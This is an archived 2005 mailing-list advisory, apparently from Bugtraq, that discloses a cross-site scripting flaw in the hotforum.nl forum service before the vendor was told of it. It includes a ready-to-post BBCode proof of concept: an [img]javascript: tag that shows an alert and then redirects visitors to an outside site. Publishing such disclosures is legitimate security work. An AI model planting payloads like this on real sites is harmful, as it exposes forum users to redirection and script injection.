|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
...::: hotforum.nl XSS exploit :::...
From: Rebyte Security (rebyte
walla.com)
Date: Sat Mar 12 2005 - 17:59:16 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
hotforum.nl XSS exploit
---------------------------
* 13 march 2005
* Discovered by Qon^Rebyte
..:: STATUS ::..
______________________________________________________________________
hotforum.nl has not yet been notified about this exploit
..:: VULNERABLE ::..
______________________________________________________________________
All hotforums, because it's an on line service.
Once the service is patched all hotforums will be immune.
..:: EXPLOIT ::..
______________________________________________________________________
Risk: Low/Medium
Type: Input Validation Error
What: Input JS code
Proof of Concept
----------------
Post this:
**********************************************************************
[img]javascript:alert('hotforum.nl xss exploit - by Qon^Rebyte');
location.replace('http://dhost.info/recall/rebyte/');[/img]
**********************************************************************
This will alert following message:
"hotforum.nl xss exploit - by Qon^Rebyte"
and redirect to another site:
"http://dhost.info/recall/rebyte/"
..:: CREDITS ::..
______________________________________________________________________
This bug was discovered in approx. 3 minutes time by Qon^Rebyte.
Because it's just a very plain XSS bug :)
Greetings fly out 2
---------------------
* Rebyte Security : because it rox :)
* Mr.Manson : Rebyte co-admin
* Bugtraq : for doing a great job
*** Qon ^ Rebyte ***
-- http://dhost.info/recall/rebyte/ --
---------- rebytewalla.com ----------
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]